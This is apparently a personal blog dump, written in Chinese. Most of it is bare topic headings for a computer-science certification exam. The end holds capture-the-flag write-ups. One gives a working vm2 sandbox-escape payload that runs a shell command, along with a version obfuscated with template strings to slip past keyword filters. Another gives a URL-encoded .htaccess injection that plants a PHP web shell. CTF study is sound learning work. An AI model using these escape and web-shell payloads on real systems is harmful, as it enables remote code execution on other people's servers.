why

未命名

发表于 2024-10-23 更新于 2024-09-05

计算机系统组成

冯诺依曼计算机的特点

输入输出设备和存储器之间道德数据传送通过运算器完成

五大部件作用

主存储器

mar可以标记存储单元的个数

mdr可以标记每个存储单元中存储元的个数

运算器

控制器

Flynn分类法

指令系统

操作码：决定干什么

地址码：决定干谁

七种寻址方式

出题类型：给出特点选择相应寻址方式，所以了解即可

指令的流水处理

多线程

流水线的计算

输入输出技术

cpu与外设之间的数据传送方式

存储结构

层次结构

分类

高速缓存cache

cache的三种地址映像

cache的性能分析

主存的扩展

虚拟存储器

磁盘存储器

总线系统

磁盘阵列技术

计算机可靠性

未命名

发表于 2024-10-23 更新于 2024-09-24

计算机网络基础

考纲要求

计算机网络的分类

七层网络体系结构！！！

网络的标准

TCP/IP协议族！！！

TCP/UDP辨析

IP地址和IPv6简介

域名

IP地址

IPv6

小tip

Internet服务！！！

未命名

发表于 2024-10-23

法律法规与标准化知识

知识产权

保护期限

知识产权人的确定

侵权判定

标准的分类和标准的编号

分类

编号

未命名

发表于 2024-10-23 更新于 2024-10-11

程序设计语言基础知识

基本概念

语言的分类

基本成分

编译与解释

编译流程

文法

语法推导树

有限自动机

答案：c

正规式–有限自动机的另一表达形式

答案：d,c

表达式

答案：d

传值与引用(传址)

答案：d

各种语言特点

未命名

发表于 2024-10-23 更新于 2024-09-23

操作系统基本原理

操作系统概念

功能与目标

特征

发展与分类

进度管理

状态转换图

前驱图

进程同步机制

进程互斥机制

信号量机制

pv操作

pv操作实现前驱操作

死锁

死锁产生的必要条件

死锁的处理策略

银行家算法

存储管理

一些小问题和回答

内存的分配与回收

首次适应算法

最佳适应算法

最差适应算法

邻近适应算法

分页存储管理

页表的作用是实现从页号到物理块号的地址映射

地址变换机构的基本任务是利用页表把用户程序中的逻辑地址变换成内存中的物理地址

分段存储管理

段页式存储管理

优点

空间浪费小、存储共享容易、存储保护容易、能动态链接

缺点

由于管理软件的层架，复杂度和开销也随之增加，需要的硬件以及占用的内容干有所增加，是的执行速度大大下降

页面置换算法

最佳置换算法（opt）

往后寻找，最后一个出现的页号就是要淘汰的页面

先进先出算法（fifo）

最近最久未使用算法（lru）

文件管理

文件管理总领

文件目录

文件的结构

索引分配

空闲存储空间的管理（位示图法）

i/o设备基本概念

i/o控制方式

微内核操作系统

未命名

发表于 2024-10-23 更新于 2024-10-24

UML建模

概述

事物

关系

图

类图

用例图

顺序图

活动图

状态图

通信图

构件图

未命名

发表于 2024-10-23 更新于 2024-10-24

专业英语词汇知识

试题分析

完形填空句法

答题要领

答题步骤

专业词汇

[SUCTF 2018]GetShell

发表于 2024-07-17

[HFCTF2020]JustEscape

发表于 2024-06-21

真的是php？

不懂

看到wp中大佬说是vm沙盒，先照着做吧

当code为空时

<?php
if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) {
    $code = $_GET['code'];
    echo eval(code);
} else {
    highlight_file(__FILE__);
}
?>

所以是一个获取键什么的

这里尝试一下

发现一长串报错

error.stack可以简单解释为用alert()弹出console.log()的一样的异常堆栈信息

在github上可以找到破坏沙盒的方法

"use strict";
const {VM} = require('vm2');
const untrusted = '(' + function(){
	TypeError.prototype.get_process = f=>f.constructor("return process")();
	try{
		Object.preventExtensions(Buffer.from("")).a = 1;
	}catch(e){
		return e.get_process(()=>{}).mainModule.require("child_process").execSync("cat /flag").toString();
	}
}+')()';
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}

其中选用

(function(){
	TypeError.prototype.get_process = f=>f.constructor("return process")();
	try{
		Object.preventExtensions(Buffer.from("")).a = 1;
	}catch(e){
		return e.get_process(()=>{}).mainModule.require("child_process").execSync("cat /flag").toString();
	})()

但是我们可以发现其中有些字符被过滤，所以，我们通过重写替换

(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_proces`}s`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return this.proces`}s`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_proces`}s`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
    }
})()

prototyp => [${${prototyp}e}]
get_process => [${${get_proces}s}]
require => [${${requir}e}]
child_process => ${${child_proces}s}
execSync => [${${exe}cSync}]

得到flag

[羊城杯2020]easyphp

发表于 2024-06-21

<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");
?>

简单直接的代码题，我不是说简单

看看代码

首先scandir获取目录，不为index.php则删除

之后就是文件写入的过滤，最后读取文件

因为文件名没有字母，所以我们可以尝试.htaccess

向.htaccess文件写入shell，并且用auto_prepend_file包含.htaccess，但是file关键字被ban了，可以用换行绕过，结尾要用\处理content中的\n

所以payload（通过注释的方式写shell）:

php_value auto_prepend_fil\e .htaccess 
#<?php system('ls /');?>\

为了不换行，我们对这个进行url编码，得到

?filename=.htaccess&content=php_value%20auto_prepend_fil%5Ce%20.htaccess%20%0A#%3C?php%20system('ls%20/');?%3E%5C%20

之后就是